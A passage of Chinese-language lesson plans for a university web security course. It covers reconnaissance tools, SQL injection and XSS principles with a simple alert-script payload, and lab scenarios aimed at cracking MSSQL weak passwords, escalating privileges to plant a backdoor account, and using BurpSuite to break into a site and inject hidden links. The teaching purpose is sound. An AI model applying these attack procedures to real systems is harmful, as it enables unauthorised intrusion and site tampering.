y插件Wappalyzer插件FlagFox插件DomainDetails插件Kali下的工具數(shù)百種，安全工具做了很好的分類。信息收集分類下還有子分類，工具比較多，這邊做以下幾點(diǎn)介紹。點(diǎn)擊DNSenum，自動(dòng)彈出當(dāng)前的參數(shù)說(shuō)明。dnsenum--enum，結(jié)果將主機(jī)地址、dns信息、郵件地址等進(jìn)行羅列。點(diǎn)擊fierce；fierce–dns輸入。識(shí)別活躍的主機(jī)、查看打開(kāi)的端口、系統(tǒng)指紋識(shí)別、服務(wù)的指紋識(shí)別：Nmaphping3（也可以用作壓力測(cè)試）2.5網(wǎng)絡(luò)社交信息收集社交網(wǎng)站特點(diǎn)：清晰暴露個(gè)人關(guān)系網(wǎng)絡(luò)包含大量個(gè)人信息具備多種工作、生活服務(wù)功能身份認(rèn)證機(jī)制并非完美記錄大量個(gè)人行為特征3漏洞掃描實(shí)驗(yàn)本小節(jié)通過(guò)對(duì)w3af工具使用方法的學(xué)習(xí)，能夠掌握服務(wù)器安全漏洞的掃描和審計(jì)方法。Step1：運(yùn)行攻擊機(jī)。運(yùn)行cd/pentest/web/w3af命令，切換到w3af工作目錄，然后使用ls命令查看當(dāng)前目錄下的文件。Step2：使用命令traget命令進(jìn)入target目錄，設(shè)置目標(biāo)地址target為08，為下一步進(jìn)行掃描進(jìn)行準(zhǔn)備，如圖5-44所示。Step3：使用back命令返回到主目錄w3af>>>，然后使用命令start開(kāi)始掃描.使用exit命令退出，然后使用ls命令查看是否有前面創(chuàng)建的testreport.html文件。Step4：利用瀏覽器（本實(shí)驗(yàn)為Firefox）打開(kāi)testreport.html文件，顯示所示的信息。（詳細(xì)步驟參見(jiàn)實(shí)驗(yàn)報(bào)告內(nèi)容）教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式講授授課日期年12月2日第14周授課時(shí)數(shù)3授課章節(jié)名稱第五章Web服務(wù)器的攻防教學(xué)目的與要求了解Web瀏覽器存在的問(wèn)題，與之相對(duì)應(yīng)進(jìn)行的攻防教學(xué)重點(diǎn)或教學(xué)難點(diǎn)難點(diǎn)：SQL注入與XSS漏洞的攻擊思想更新、補(bǔ)充、刪節(jié)內(nèi)容使用教具或手段課外作業(yè)課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)第5章Web服務(wù)器的攻防5.4Web應(yīng)用程序的攻防Web應(yīng)用程序安全威脅根據(jù)Web應(yīng)用所受到的威脅、攻擊的共同特征分類：SQL注入漏洞SQL注入攻擊示意圖SQL注入威脅表現(xiàn)形式可以體現(xiàn)為以下幾點(diǎn)：繞過(guò)認(rèn)證，獲得非法權(quán)限猜解后臺(tái)數(shù)據(jù)庫(kù)全部的信息注入可以借助數(shù)據(jù)庫(kù)的存儲(chǔ)過(guò)程進(jìn)行提權(quán)等操作SQL注入攻擊的典型手段判斷應(yīng)用程序是否存在注入漏洞收集信息、并判斷數(shù)據(jù)庫(kù)類型根據(jù)注入?yún)?shù)類型，重構(gòu)SQL語(yǔ)句的原貌猜解表名、字段名獲取賬戶信息、攻擊web或?yàn)橄乱徊焦糇鰷?zhǔn)備SQL注入攻擊的原理SQL注入攻擊過(guò)程（1）尋找注入點(diǎn)最常見(jiàn)的SQL注入點(diǎn)的判斷方法是在動(dòng)態(tài)網(wǎng)頁(yè)中尋找如下形式的鏈接： http://Website/**.asp?xx=abc http://Website/**.php?xx=abc http://Website/**.jsp?xx=abc http://Website/**.aspx?xx=abc（2）探測(cè)后臺(tái)數(shù)據(jù)庫(kù)的類型利用Web應(yīng)用程序的開(kāi)發(fā)語(yǔ)言來(lái)猜測(cè)后臺(tái)數(shù)據(jù)庫(kù)的類型；借助數(shù)據(jù)庫(kù)的一些特征來(lái)探測(cè)后臺(tái)數(shù)據(jù)庫(kù)的類型。（3）獲得管理員賬戶信息跨站腳本（XSS）漏洞（1）反射式XSS攻擊反射式XSS攻擊也稱為非持久性XSS攻擊或參數(shù)型XSS攻擊，是一種最常見(jiàn)的XSS攻擊類型，主要用于將惡意腳本附加到URL地址的參數(shù)中，如：http://WebSite/home.php?id=<script>alert(/xss/)</script>。反射式XSS攻擊實(shí)現(xiàn)過(guò)程：攻擊者發(fā)現(xiàn)存在XSS安全漏洞網(wǎng)頁(yè)（URL）后，根據(jù)輸出點(diǎn)的環(huán)境構(gòu)造XSS攻擊代碼并進(jìn)行編碼；然后通過(guò)特定手段(如發(fā)送電子郵件)發(fā)送給受害者，誘使受害者去訪問(wèn)一個(gè)包含惡意代碼的URL；當(dāng)受害者點(diǎn)擊這個(gè)經(jīng)過(guò)專門設(shè)計(jì)的URL鏈接后，攻擊代碼會(huì)直接在受害者的瀏覽器上解析并執(zhí)行。（2）存儲(chǔ)式XSS攻擊存儲(chǔ)式XSS攻擊的攻擊代碼持久性地保存在Web服務(wù)器中，不需要用戶點(diǎn)擊特定的URL就能夠執(zhí)行跨站腳本，并在用戶端執(zhí)行惡意代碼；利用存儲(chǔ)式XSS漏洞可以編寫危害性更大的XSS蠕蟲(chóng)，XSS蠕蟲(chóng)會(huì)直接影響到網(wǎng)站的所有用戶，當(dāng)一個(gè)地方出現(xiàn)XSS漏洞時(shí)，相同站點(diǎn)下的所有用戶都可能被攻擊。（3）基于DOM的XSS攻擊5.5Web服務(wù)器軟件的攻防Apache攻防Apache安全漏洞分析：與其他服務(wù)器軟件一樣，Apache同樣也因出現(xiàn)一些高危安全漏洞導(dǎo)致系統(tǒng)服務(wù)出現(xiàn)安全問(wèn)題，但通過(guò)對(duì)近年來(lái)發(fā)生的大量安全漏洞的統(tǒng)計(jì)分析，Apache的高危漏洞主要集中在Apache模塊（ApacheModules），而非Apache核心程序。這是因?yàn)锳pache核心程序的設(shè)計(jì)是非常安全的，但大量的官方和非官方模塊的出現(xiàn)，在豐富了Apache應(yīng)用功能的同時(shí)，卻帶來(lái)了大量的安全隱患。尤其在安裝了Apache后，默認(rèn)安裝和啟動(dòng)的模塊中存在不少的安全漏洞。Apache的防范：針對(duì)Apache管理員賬戶的防范Apache服務(wù)器配置文件Apache服務(wù)器的密碼保護(hù)IIS攻防與其他的網(wǎng)絡(luò)服務(wù)守護(hù)進(jìn)程一樣，IIS同樣也面臨著緩沖區(qū)溢出、不安全代碼和指針、格式化字符串等一系列攻擊，這類攻擊是基于數(shù)據(jù)驅(qū)動(dòng)安全漏洞的遠(yuǎn)程滲透攻擊，往往能夠讓攻擊者在Web服務(wù)器上直接獲得遠(yuǎn)程代碼的執(zhí)行權(quán)，并執(zhí)行一些操作。IIS的安全配置：（1）禁用默認(rèn)網(wǎng)站（2）防止資源解析攻擊（3）正確選擇驗(yàn)證方式IIS提供的4種身份驗(yàn)證方式比較：（4）通過(guò)IP地址限制連接

教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)1授課形式上機(jī)授課日期年12月4日第14周授課時(shí)數(shù)3授課章節(jié)名稱實(shí)驗(yàn)XSS跨站腳本攻擊以及MSSQL提權(quán)教學(xué)目的與要求熟悉系統(tǒng)提權(quán)攻擊基本方法的基礎(chǔ)上，以MSSQL數(shù)據(jù)庫(kù)系統(tǒng)為操作對(duì)象，掌握針對(duì)MSSQL提權(quán)的實(shí)現(xiàn)方法。了解XSS漏洞的攻擊原理及相關(guān)知識(shí)，能夠進(jìn)行簡(jiǎn)單的XSS攻擊教學(xué)重點(diǎn)或教學(xué)難點(diǎn)MSSQL提權(quán)XSS跨站腳本攻擊更新、補(bǔ)充、刪節(jié)內(nèi)容使用教具或手段課外作業(yè)課后體會(huì)防范XSS攻擊的方法針對(duì)MSSQL提權(quán)攻擊的防范方法授課主要內(nèi)容或板書(shū)設(shè)計(jì)XSS跨站腳本攻擊以及MSSQL提權(quán)1、MSSQL提權(quán)操作情景設(shè)置目標(biāo)：入侵一個(gè)系統(tǒng)，在其中設(shè)置一個(gè)后門賬戶。方法：采用字典破解方式獲得MSSQL的賬戶，當(dāng)前為普通用戶，因此利用MSSQL提權(quán)至管理員賬戶，最后添加后門賬戶。實(shí)驗(yàn)確認(rèn)被攻擊系統(tǒng)的IP地址和SQLServer是否已經(jīng)正常啟動(dòng)運(yùn)行X-Scan掃描器，掃描被攻擊系統(tǒng)SQL-Server弱口令掃描參數(shù)設(shè)置設(shè)置字典使用第三方工具SQLTools工具連接到MSSQL數(shù)據(jù)庫(kù)執(zhí)行DOS命令界面，查看當(dāng)前用戶權(quán)限查詢分析器連接MSSQL數(shù)據(jù)庫(kù)在查詢分析器中執(zhí)行提權(quán)代碼查看當(dāng)前用戶權(quán)限使用DOS命令添加后門賬戶2、XSS跨站腳本攻擊通過(guò)XAMPP的控制臺(tái)啟動(dòng)XAMPP的Apache和MySQL服務(wù)配置DVWA平臺(tái)XSS反射式攻擊反射式XSS攻擊頁(yè)面PHP源碼分析反射式XSS攻擊（頁(yè)面效果與URL信息）XSS存儲(chǔ)式攻擊存儲(chǔ)式XSS攻擊頁(yè)面PHP源碼分析反射式XSS攻擊（在Message輸入框中輸入<script>alert(/XSS/)</script>）

教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)1授課形式講授授課日期年12月9日第15周授課時(shí)數(shù)3授課章節(jié)名稱第六章Web瀏覽器的攻防教學(xué)目的與要求了解Web瀏覽器存在的問(wèn)題，與之相對(duì)應(yīng)進(jìn)行的攻防教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：了解web瀏覽器存在的問(wèn)題，以及瀏覽器插件和腳本的攻防更新、補(bǔ)充、刪節(jié)內(nèi)容使用教具或手段課外作業(yè)課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)第六章Web瀏覽器的攻防6.1Web瀏覽器技術(shù)萬(wàn)維網(wǎng)WWW應(yīng)用特點(diǎn)Web瀏覽器歷史國(guó)外發(fā)展歷史國(guó)內(nèi)發(fā)展歷史Web瀏覽器的安全安全性分析：B/S結(jié)構(gòu)安全分析Web瀏覽器自身安全分析擴(kuò)展程序、插件等附加產(chǎn)品安全分析Web瀏覽器權(quán)限控制安全分析Web瀏覽器安全風(fēng)險(xiǎn)涉及內(nèi)容Web瀏覽器的隱私保護(hù)Web瀏覽器隱私泄露分析瀏覽器會(huì)收集用戶的上網(wǎng)行為，通過(guò)大數(shù)據(jù)分析，了解用戶的個(gè)人信息收集原因：用戶上網(wǎng)信息中蘊(yùn)藏著大量的商業(yè)利益，所以一些公司和商業(yè)機(jī)構(gòu)出于自身利益會(huì)大量收集用戶的上網(wǎng)信息。Web瀏覽器還會(huì)記錄用戶的上網(wǎng)行為基于DNT的隱私泄露防范方法DNT（DoNotTrack，請(qǐng)勿跟蹤）是瀏覽器提供的一項(xiàng)禁止對(duì)用戶上網(wǎng)行為進(jìn)行跟蹤的功能。利用“隱私瀏覽模式”防范隱私泄露：Web開(kāi)放數(shù)據(jù)挖掘形成的安全威脅隱私數(shù)據(jù)保護(hù)分析：開(kāi)放數(shù)據(jù)保護(hù)與利用是鏡子的兩面，就像隱私保護(hù)和讓渡隱私增強(qiáng)個(gè)性化體驗(yàn)一樣，需要網(wǎng)站所屬企業(yè)、安全廠商，以及監(jiān)管第三方共同努力。而從技術(shù)角度講，網(wǎng)站的防護(hù)思路也需要轉(zhuǎn)變，比如及時(shí)檢測(cè)和避免公開(kāi)數(shù)據(jù)被惡意抓取，采取技術(shù)手段強(qiáng)化數(shù)據(jù)安全存儲(chǔ)與傳輸?shù)?。這些都將成為研究者和安全廠商未來(lái)的研究方向。6.2Web瀏覽器插件和腳本的攻防Web瀏覽器插件的攻防Web瀏覽器常用插件：常見(jiàn)的Web瀏覽器插件有Flash插件、RealPlayer插件、MMS插件、MIDI五線譜插件、ActiveX插件等。插件分類：根據(jù)插件在Web瀏覽器中的加載位置，可以分為工具條（Toolbar）、瀏覽器輔助（BHO）、搜索掛接（URLSearchhook）和下載ActiveX等方式。常見(jiàn)插件介紹插件帶來(lái)的風(fēng)險(xiǎn)分析腳本的攻防腳本病毒介紹：腳本病毒的防范方法：腳本病毒的檢測(cè)與防范思路與對(duì)傳統(tǒng)病毒的檢測(cè)與防范方法基本相同。傳統(tǒng)的病毒檢測(cè)方法包括特征代碼法、校驗(yàn)和法、行為監(jiān)測(cè)法、軟件模擬法等：特征代碼法提取病毒的某一小段特征代碼進(jìn)行識(shí)別，所以對(duì)未知病毒幾乎無(wú)法預(yù)測(cè)，另外新增病毒的數(shù)量在不斷加大的情況下，病毒特征代碼的數(shù)量也在加大，會(huì)影響檢測(cè)速度；校驗(yàn)和法是對(duì)文件作校驗(yàn)和，并將其保存，一旦校驗(yàn)和改變，就視為異常，這種檢測(cè)方法依賴文件長(zhǎng)度和內(nèi)容，預(yù)警過(guò)于敏感容易產(chǎn)生誤報(bào)；行為監(jiān)測(cè)法從理論上講可以監(jiān)測(cè)到未知病毒，但是實(shí)現(xiàn)復(fù)雜，速度較低。6.3針對(duì)Web瀏覽器Cookie的攻防Cookie介紹Cookie產(chǎn)生背景Cookie的發(fā)展歷史Cookie的功能及應(yīng)用Cookie的組成及工作原理Cookie的工作機(jī)制2）由Web客戶端生成的Cookie格式由客戶端生成的CookieHeader由“NAME=VALUE”對(duì)組成，其格式為： NAME1=VALUE1[;NAME2=VALUE2]……[;NAMEi=VALUEi]其中，NAMEi表示第i個(gè)Cookie的名稱，VALUEi表示其值。這里的NAME和對(duì)應(yīng)的VALUE與Set-Cookie中的相同。3）由Web服務(wù)器生成的Cookie格式Cookie的安全防范教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式上機(jī)授課日期年12月11日第15周授課時(shí)數(shù)3授課章節(jié)名稱實(shí)驗(yàn)BurpSuite漏洞掃描和WeGoat使用教學(xué)目的與要求學(xué)習(xí)漏洞掃描技術(shù)的基本原理，了解漏洞掃描技術(shù)在網(wǎng)絡(luò)攻防中的作用，學(xué)會(huì)使用BurpSuite對(duì)目標(biāo)網(wǎng)站進(jìn)行掃描的具體方法，并根據(jù)報(bào)告做出相應(yīng)的防護(hù)措施。掌握基于應(yīng)用層的弱點(diǎn)測(cè)試手段與方法，學(xué)會(huì)使用WebGoat工具演示W(wǎng)eb瀏覽器中的典型安全漏洞的應(yīng)用程序教學(xué)重點(diǎn)或教學(xué)難點(diǎn)BurpSuite漏洞掃描WebGoat工具使用更新、補(bǔ)充、刪節(jié)內(nèi)容使用教具或手段課外作業(yè)課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)BurpSuite漏洞掃描和WeGoat使用BurpSuite漏洞掃描情景設(shè)置目標(biāo)：遠(yuǎn)程入侵網(wǎng)站服務(wù)器植入暗鏈牟利方法：采用BurpSuite工具掃描存在漏洞的網(wǎng)站，然后攻入對(duì)方服務(wù)器，在網(wǎng)頁(yè)中植入暗鏈實(shí)驗(yàn)在靶機(jī)上搭建一個(gè)簡(jiǎn)單的網(wǎng)站BurpSuite工具捕獲Web瀏覽器的操作使用spider主要通過(guò)網(wǎng)絡(luò)爬蟲(chóng)來(lái)爬取網(wǎng)頁(yè)信息掃描網(wǎng)站存在的漏洞利用漏洞攻擊進(jìn)入對(duì)方網(wǎng)站后臺(tái)管理界面修改后臺(tái)數(shù)據(jù)，在對(duì)方網(wǎng)站中植入暗鏈WeGoat使用字符串型SQL注入實(shí)驗(yàn)選取StringSQLInjection輸入SQL注入命令通過(guò)注入SQL查詢命令，獲得所有的用戶列表教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)1授課形式講授授課日期年12月16日第16周授課時(shí)數(shù)3授課章節(jié)名稱第六章Web瀏覽器的攻防教學(xué)目的與要求了解Web瀏覽器存在的問(wèn)題，與之相對(duì)應(yīng)進(jìn)行的攻防教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：了解網(wǎng)絡(luò)釣魚(yú)和黑鏈攻擊的概念更新、補(bǔ)充、刪節(jié)內(nèi)容使用教具或手段課外作業(yè)課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)第六章Web瀏覽器的攻防6.4網(wǎng)頁(yè)木馬的攻防網(wǎng)頁(yè)木馬的攻擊原理網(wǎng)頁(yè)木馬概念從技術(shù)本質(zhì)來(lái)看，網(wǎng)頁(yè)木馬主要利用了Web瀏覽器軟件中所支持的客戶端腳本執(zhí)行能力，通過(guò)對(duì)Web瀏覽器軟件安全漏洞的利用而對(duì)客戶端實(shí)施參透攻擊，在獲取了對(duì)客戶端主機(jī)的遠(yuǎn)程代碼執(zhí)行權(quán)限后再植入木馬程序，進(jìn)而發(fā)起有針對(duì)性的攻擊；從發(fā)展歷程來(lái)看，網(wǎng)頁(yè)木馬是針對(duì)網(wǎng)絡(luò)服務(wù)的一種攻擊行為，只是早期的攻擊主要針對(duì)的是服務(wù)器軟件，而網(wǎng)頁(yè)木馬則主要針對(duì)的是Web瀏覽器軟件?？蛻舳烁腥镜膬蓚€(gè)階段漏洞利用階段。網(wǎng)頁(yè)木馬被客戶端加載后，攻擊代碼利用內(nèi)存破壞類漏洞將執(zhí)行流跳轉(zhuǎn)到ShellCode或者直接利用任意下載API，在客戶端下載、執(zhí)行盜號(hào)木馬或僵尸程序等惡意程序。惡意程序執(zhí)行階段。下載的盜號(hào)木馬或僵尸程序等惡意程序，竊取客戶端的帳號(hào)等隱私信息或使客戶端成為“肉雞”加入僵尸網(wǎng)絡(luò)。網(wǎng)頁(yè)木馬攻擊載體具體攻擊步驟：攻擊者選取存在安全漏洞的Web站點(diǎn)植入網(wǎng)頁(yè)木馬程序（一般還會(huì)同時(shí)植入其他的木馬程序，如盜號(hào)木馬），將其作為攻擊過(guò)程中的木馬宿主站點(diǎn)；通過(guò)在大量網(wǎng)站中嵌入惡意鏈接將用戶訪問(wèn)重定向到網(wǎng)頁(yè)木馬，從而構(gòu)成一個(gè)網(wǎng)頁(yè)木馬攻擊網(wǎng)絡(luò)；當(dāng)不明真相的用戶在訪問(wèn)了含有木馬程序的網(wǎng)站后，就會(huì)自動(dòng)地鏈接網(wǎng)頁(yè)木馬并遭受攻擊，成為網(wǎng)頁(yè)木馬的受害者。網(wǎng)頁(yè)掛馬的實(shí)現(xiàn)方法內(nèi)嵌鏈接內(nèi)嵌HTML標(biāo)簽內(nèi)嵌對(duì)象鏈接內(nèi)嵌對(duì)象鏈接是利用Flash等工具內(nèi)嵌對(duì)象中的特定功能來(lái)實(shí)現(xiàn)指定頁(yè)面加載的一種方法。惡意Script腳